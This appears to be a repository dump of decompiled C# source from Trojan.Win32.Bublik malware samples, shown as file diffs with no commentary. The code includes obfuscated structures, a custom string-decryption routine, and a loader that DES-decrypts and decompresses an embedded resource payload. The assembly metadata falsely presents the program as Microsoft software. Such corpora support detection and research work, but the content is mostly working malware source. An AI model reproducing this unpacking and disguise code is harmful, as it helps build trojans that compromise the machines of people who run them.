[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \u0003.\u0005\u2001[] \u0005\u2003;
}
private struct \u000E\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \u0002\u2000;
public uint \u0003\u2000;
}
private struct \u000F\u2001
{
public uint \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public \u0003.\u000E\u2001 \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public uint \u000E\u2000;
public uint \u000F\u2000;
public uint \u0002\u2001;
public uint \u0003\u2001;
public uint \u0005\u2001;
public uint \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public uint \u0003\u2002;
public uint \u0005\u2002;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \u0008\u2002;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/_0005.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using System.Runtime.InteropServices;
internal sealed class \u0005
{
internal static \u0005.\u0002 \u0002;
[StructLayout(LayoutKind.Explicit, Size = 7, Pack = 1)]
private struct \u0002
{
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/_0006.cs
+31
View File
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
internal static class \u0006
{
public static byte[] \u0002(byte[] _param0, byte[] _param1)
{
byte num1 = _param0[1];
int length = _param1.Length;
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
ushort num4 = 0;
for (int index = 0; index < length; ++index)
{
if ((index & 1) == 0)
{
num3 = (uint) ((int) num3 * 214013 + 2531011);
num4 = (ushort) (num3 >> 16);
}
byte num5 = (byte) num4;
num4 >>= 8;
byte num6 = _param1[index];
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
num2 = num6;
}
return _param1;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/_0008.cs
+101
View File
@@ -0,0 +1,101 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u0008
{
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(47);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static bool \u0006;
private static byte[] \u000E;
private static bool \u000F;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static string \u0002(int _param0)
{
if (\u0008.\u000F)
{
string str;
\u0008.\u0002.TryGetValue(_param0, out str);
return str;
}
lock (\u0008.\u0002)
{
string str1;
if (\u0008.\u0002.TryGetValue(_param0, out str1))
return str1;
if (\u0008.\u0003 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
\u0008.\u0006 = false;
\u0008.\u0003 = new BinaryReader(executingAssembly.GetManifestResourceStream("\u200B"));
short count = (short) ((int) \u0008.\u0003.ReadInt16() ^ -18656);
if (count == (short) 0)
\u0008.\u0008 = (short) ((int) \u0008.\u0003.ReadInt16() ^ 30416);
else
\u0008.\u0005 = \u0008.\u0003.ReadBytes((int) count);
\u0008.\u000E = executingAssembly.GetName().GetPublicKeyToken();
if (\u0008.\u000E != null && \u0008.\u000E.Length == 0)
\u0008.\u000E = (byte[]) null;
}
int num1 = _param0 ^ -665677667;
\u0008.\u0003.BaseStream.Position = (long) num1;
byte[] numArray;
if (\u0008.\u0005 != null)
{
numArray = \u0008.\u0005;
}
else
{
short count = \u0008.\u0008 != (short) -1 ? \u0008.\u0008 : (short) ((int) \u0008.\u0003.ReadInt16() ^ -31071 ^ num1);
numArray = count != (short) 0 ? \u0008.\u0003.ReadBytes((int) count) : (byte[]) null;
}
int count1 = \u0008.\u0003.ReadInt32() ^ num1 ^ 982698659;
bool flag = (count1 & int.MinValue) != 0;
if (flag)
count1 &= int.MaxValue;
byte[] bytes = \u0006.\u0002(numArray, \u0008.\u0003.ReadBytes(count1));
if (\u0008.\u000E != null != \u0008.\u0006)
{
for (int index = 0; index < count1; ++index)
{
byte num2 = \u0008.\u000E[index & 7];
byte num3 = (byte) ((int) num2 << 3 | (int) num2 >> 5);
bytes[index] = (byte) ((uint) bytes[index] ^ (uint) num3);
}
}
string str2;
if (flag && !\u0008.\u0006)
{
char[] chArray = new char[count1];
for (int index = 0; index < count1; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
}
else
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
if (\u0008.\u0006)
str2 = (_param0 + count1 ^ 936568).ToString("X");
string str3 = string.Intern(str2);
\u0008.\u0002.Add(_param0, str3);
if (\u0008.\u0002.Count == 47)
{
\u0008.\u0003.Close();
\u0008.\u0003 = (BinaryReader) null;
\u0008.\u0005 = \u0008.\u000E = (byte[]) null;
\u0008.\u000F = true;
}
return str3;
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/file
+1
View File
File diff suppressed because one or more lines are too long
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/        ​   
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/AssemblyInfo.cs
+17
View File
@@ -0,0 +1,17 @@
using System.Reflection;
using System.Resources;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyDescription("Microsoft Builder Club")]
[assembly: AssemblyTitle("Club")]
[assembly: AssemblyProduct("Builder")]
[assembly: AssemblyCopyright("Copyright (c) Microsoft 2011")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyFileVersion("1.01.0.0")]
[assembly: SuppressIldasm]
[assembly: ComVisible(false)]
[assembly: Guid("2c7c94c1-930a-47cd-9a5f-37466f156633")]
[assembly: NeutralResourcesLanguage("en-AU")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/Club
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/Trojan.Win32.Bublik.elhu.csproj
+57
View File
@@ -0,0 +1,57 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{7603EB36-64ED-4E9E-88BA-358782ACC649}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Club</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>A</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="ced138b6eee8b5fea3f196334f6720805.cs" />
<Compile Include="c1a978f6ad601a840a4c556c463434740.cs" />
<Compile Include="c989fcefb2025a0c5c08fe9654b0238e2.cs" />
<Compile Include="c9b81fdde8dea987fa347362a8b38f66c.cs" />
<Compile Include="c0101fd8803cfd89ecc47c2ee5ea3536d.cs" />
<Compile Include="c5269112b03e601219f1714817a27b79a.cs" />
<Compile Include="cfd7a845189f70212b2f34a945b41994e.cs" />
<Compile Include="cb172a3cf4de66a26f276fa336a900f40.cs" />
<Compile Include="cc67fcb12c7ab50e974a357101bdbe09d.cs" />
<Compile Include="Club\Form1.cs" />
<Compile Include="Club\My\MySettings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Club" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/Trojan.Win32.Bublik.elhu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Club", "Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.csproj", "{7603EB36-64ED-4E9E-88BA-358782ACC649}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{7603EB36-64ED-4E9E-88BA-358782ACC649}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{7603EB36-64ED-4E9E-88BA-358782ACC649}.Debug|Any CPU.Build.0 = Debug|Any CPU
{7603EB36-64ED-4E9E-88BA-358782ACC649}.Release|Any CPU.ActiveCfg = Release|Any CPU
{7603EB36-64ED-4E9E-88BA-358782ACC649}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/_003CModule_003E.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using A;
internal class \u003CModule\u003E
{
static \u003CModule\u003E() => ced138b6eee8b5fea3f196334f6720805.c496a7d7e6524413c65d8aa7379640bb1();
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/c0101fd8803cfd89ecc47c2ee5ea3536d.cs
+89
View File
@@ -0,0 +1,89 @@
// Decompiled with JetBrains decompiler
// Type: A.c0101fd8803cfd89ecc47c2ee5ea3536d
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
using System.Text;
namespace A
{
internal class c0101fd8803cfd89ecc47c2ee5ea3536d
{
internal static readonly byte[] c112400f52e4f1731c90e00a5d01561a1;
static c0101fd8803cfd89ecc47c2ee5ea3536d()
{
if (c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1 != null)
return;
label_1:
switch (6)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c0101fd8803cfd89ecc47c2ee5ea3536d.\u002Ecctor);
}
Assembly executingAssembly = Assembly.GetExecutingAssembly();
c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1 = c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c(executingAssembly.GetManifestResourceStream(executingAssembly.GetName().Name + executingAssembly.GetName().Name));
break;
}
}
internal static string c63a0ab0f5643f828f13c6bbd6a2b539a(int c6fa5d0055fdf0336425be3f2919ce835)
{
int count;
if (((int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835] & 128) == 0)
{
label_1:
switch (1)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a);
}
count = (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835];
++c6fa5d0055fdf0336425be3f2919ce835;
break;
}
}
else if (((int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835] & 64) == 0)
{
label_6:
switch (2)
{
case 0:
goto label_6;
default:
count = ((int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835] & -129) << 8 | (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835 + 1];
c6fa5d0055fdf0336425be3f2919ce835 += 2;
break;
}
}
else
{
count = ((int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835] & -193) << 24 | (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835 + 1] << 16 | (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835 + 2] << 8 | (int) c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1[c6fa5d0055fdf0336425be3f2919ce835 + 3];
c6fa5d0055fdf0336425be3f2919ce835 += 4;
}
if (count >= 1)
return string.Intern(Encoding.Unicode.GetString(c0101fd8803cfd89ecc47c2ee5ea3536d.c112400f52e4f1731c90e00a5d01561a1, c6fa5d0055fdf0336425be3f2919ce835, count));
label_10:
switch (7)
{
case 0:
goto label_10;
default:
return string.Empty;
}
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/c1a978f6ad601a840a4c556c463434740.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: A.c1a978f6ad601a840a4c556c463434740
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Windows.Forms;
namespace A
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class c1a978f6ad601a840a4c556c463434740 : WindowsFormsApplicationBase
{
[DebuggerStepThrough]
public c1a978f6ad601a840a4c556c463434740()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[STAThread]
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static void ced167a9eb7ac3392976147c9472db7e2(
string[] c5f57efc49d6476e70207a1b8d3f1ca77)
{
try
{
cb172a3cf4de66a26f276fa336a900f40.c8a7fc1893bd951199feb87a0595012ad();
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
c9b81fdde8dea987fa347362a8b38f66c.c8b84d0974b93f773bcc7dafeea38d1e0.Run(c5f57efc49d6476e70207a1b8d3f1ca77);
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) c9b81fdde8dea987fa347362a8b38f66c.c0d14e620a03587bae92914b08d618907.cf7c417efd3c27564c3ec7f3ff8a83d6a;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/c5269112b03e601219f1714817a27b79a.cs
+231
View File
@@ -0,0 +1,231 @@
// Decompiled with JetBrains decompiler
// Type: A.c5269112b03e601219f1714817a27b79a
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Security.Cryptography;
namespace A
{
internal class c5269112b03e601219f1714817a27b79a
{
private static MemoryStream cd2eaac5e5f73ec3a66fdd3ed367eeced;
private static MemoryStream c6f2cbc6593d40410ef94f1b8258739e0;
private static object c1f7900f43ed675e62b2abd919f121dd3;
private static int cda9a7d97b6e4e1056818dbe1f3855a7c = int.MaxValue;
private static int c14664cb24e0f9f35e1b155f5f1c3a44b = int.MinValue;
static c5269112b03e601219f1714817a27b79a()
{
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced = (MemoryStream) null;
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0 = (MemoryStream) null;
c5269112b03e601219f1714817a27b79a.c1f7900f43ed675e62b2abd919f121dd3 = new object();
}
internal static byte[] c09b1f452b50c37ba72a9d599e693a36c(
Stream c97c5608f851a4e11ad0df790743f222e)
{
lock (c5269112b03e601219f1714817a27b79a.c1f7900f43ed675e62b2abd919f121dd3)
{
Stream stream = c97c5608f851a4e11ad0df790743f222e;
MemoryStream memoryStream = (MemoryStream) null;
byte num1 = (byte) c97c5608f851a4e11ad0df790743f222e.ReadByte();
if (((int) num1 & 1) != 0)
{
label_2:
switch (5)
{
case 0:
goto label_2;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c);
}
DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
byte[] buffer1 = new byte[8];
c97c5608f851a4e11ad0df790743f222e.Read(buffer1, 0, 8);
cryptoServiceProvider.IV = buffer1;
byte[] buffer2 = new byte[8];
c97c5608f851a4e11ad0df790743f222e.Read(buffer2, 0, 8);
bool flag = true;
foreach (byte num2 in buffer2)
{
if (num2 != (byte) 0)
{
flag = false;
goto label_11;
}
}
label_10:
switch (3)
{
case 0:
goto label_10;
}
label_11:
if (flag)
buffer2 = Assembly.GetExecutingAssembly().GetName().GetPublicKeyToken();
cryptoServiceProvider.Key = buffer2;
if (c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced == null)
{
label_14:
switch (1)
{
case 0:
goto label_14;
default:
if (c5269112b03e601219f1714817a27b79a.cda9a7d97b6e4e1056818dbe1f3855a7c == int.MaxValue)
{
label_16:
switch (5)
{
case 0:
goto label_16;
default:
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced = new MemoryStream((int) c97c5608f851a4e11ad0df790743f222e.Length);
break;
}
}
else
{
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced = new MemoryStream(c5269112b03e601219f1714817a27b79a.cda9a7d97b6e4e1056818dbe1f3855a7c);
break;
}
break;
}
}
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced.Position = 0L;
ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor();
int inputBlockSize = decryptor.InputBlockSize;
int outputBlockSize = decryptor.OutputBlockSize;
byte[] numArray1 = new byte[decryptor.OutputBlockSize];
byte[] numArray2 = new byte[decryptor.InputBlockSize];
int position;
for (position = (int) c97c5608f851a4e11ad0df790743f222e.Position; (long) (position + inputBlockSize) < c97c5608f851a4e11ad0df790743f222e.Length; position += inputBlockSize)
{
c97c5608f851a4e11ad0df790743f222e.Read(numArray2, 0, inputBlockSize);
int count = decryptor.TransformBlock(numArray2, 0, inputBlockSize, numArray1, 0);
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced.Write(numArray1, 0, count);
}
label_22:
switch (3)
{
case 0:
goto label_22;
default:
c97c5608f851a4e11ad0df790743f222e.Read(numArray2, 0, (int) (c97c5608f851a4e11ad0df790743f222e.Length - (long) position));
byte[] buffer3 = decryptor.TransformFinalBlock(numArray2, 0, (int) (c97c5608f851a4e11ad0df790743f222e.Length - (long) position));
c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced.Write(buffer3, 0, buffer3.Length);
stream = (Stream) c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced;
stream.Position = 0L;
memoryStream = c5269112b03e601219f1714817a27b79a.cd2eaac5e5f73ec3a66fdd3ed367eeced;
break;
}
break;
}
}
if (((int) num1 & 2) != 0)
{
label_25:
switch (3)
{
case 0:
goto label_25;
default:
try
{
if (c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0 == null)
{
label_27:
switch (6)
{
case 0:
goto label_27;
default:
if (c5269112b03e601219f1714817a27b79a.c14664cb24e0f9f35e1b155f5f1c3a44b == int.MinValue)
{
label_29:
switch (7)
{
case 0:
goto label_29;
default:
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0 = new MemoryStream((int) stream.Length * 2);
break;
}
}
else
{
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0 = new MemoryStream(c5269112b03e601219f1714817a27b79a.c14664cb24e0f9f35e1b155f5f1c3a44b);
break;
}
break;
}
}
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0.Position = 0L;
DeflateStream deflateStream = new DeflateStream(stream, CompressionMode.Decompress);
int count1 = 1000;
byte[] buffer = new byte[count1];
int count2;
do
{
count2 = deflateStream.Read(buffer, 0, count1);
if (count2 > 0)
{
label_34:
switch (1)
{
case 0:
goto label_34;
default:
c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0.Write(buffer, 0, count2);
break;
}
}
}
while (count2 >= count1);
label_37:
switch (4)
{
case 0:
goto label_37;
default:
memoryStream = c5269112b03e601219f1714817a27b79a.c6f2cbc6593d40410ef94f1b8258739e0;
break;
}
}
catch (Exception ex)
{
break;
}
break;
}
}
if (memoryStream != null)
{
label_41:
switch (5)
{
case 0:
goto label_41;
default:
return memoryStream.ToArray();
}
}
else
{
byte[] buffer = new byte[c97c5608f851a4e11ad0df790743f222e.Length - c97c5608f851a4e11ad0df790743f222e.Position];
c97c5608f851a4e11ad0df790743f222e.Read(buffer, 0, buffer.Length);
return buffer;
}
}
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/c989fcefb2025a0c5c08fe9654b0238e2.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: A.c989fcefb2025a0c5c08fe9654b0238e2
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace A
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class c989fcefb2025a0c5c08fe9654b0238e2 : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public c989fcefb2025a0c5c08fe9654b0238e2()
{
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/c9b81fdde8dea987fa347362a8b38f66c.cs
+310
View File
@@ -0,0 +1,310 @@
// Decompiled with JetBrains decompiler
// Type: A.c9b81fdde8dea987fa347362a8b38f66c
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Club;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace A
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class c9b81fdde8dea987fa347362a8b38f66c
{
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c989fcefb2025a0c5c08fe9654b0238e2> c6d6861147410be7d3c02208cc91f920b = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c989fcefb2025a0c5c08fe9654b0238e2>();
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c1a978f6ad601a840a4c556c463434740> cf1913bd55cb878b4fcc66db187333603 = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c1a978f6ad601a840a4c556c463434740>();
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<User> c5882d9714618e820b0e232605fa4e6a8 = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<User>();
